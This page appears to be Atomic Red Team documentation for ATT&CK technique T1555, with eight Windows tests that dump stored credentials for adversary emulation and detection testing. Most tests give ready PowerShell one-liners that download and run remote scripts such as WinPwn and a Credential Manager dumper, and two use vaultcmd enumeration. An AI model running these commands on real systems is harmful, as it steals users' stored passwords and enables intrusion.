T1555 - Credentials from Password Stores
Description from ATT&CK (opens in a new tab)
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
Atomic Tests
-
Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
-
Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials
-
Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
Atomic Test #1 - Extract Windows Credential Manager via VBA
This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt
Supported Platforms: Windows
auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
Attack Commands: Run with powershell
!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
Cleanup Commands:
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
Dependencies: Run with powershell
!
Description: Microsoft Word must be installed
Check Prereq Commands:
try {
New-Object -COMObject "word.Application" | Out-Null
$process = "winword"
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Commands:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
This module will extract the credentials from Windows Credential Manager
Supported Platforms: Windows
auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
Attack Commands: Run with powershell
!
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
This module will extract the credentials from Windows Credential Manager
Supported Platforms: Windows
auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
Attack Commands: Run with powershell
!
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
Supported Platforms: Windows
auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
Attack Commands: Run with powershell
!
vaultcmd /listcreds:"Windows Credentials" /all
Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
Supported Platforms: Windows
auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
Attack Commands: Run with powershell
!
vaultcmd /listcreds:"Web Credentials" /all
Atomic Test #6 - WinPwn - Loot local Credentials - lazagne
The LaZagne project (opens in a new tab) is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software
Supported Platforms: Windows
auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
Attack Commands: Run with powershell
!
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials
Loot local Credentials - Wifi Credentials technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
Attack Commands: Run with powershell
!
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive
Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
Attack Commands: Run with powershell
!
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive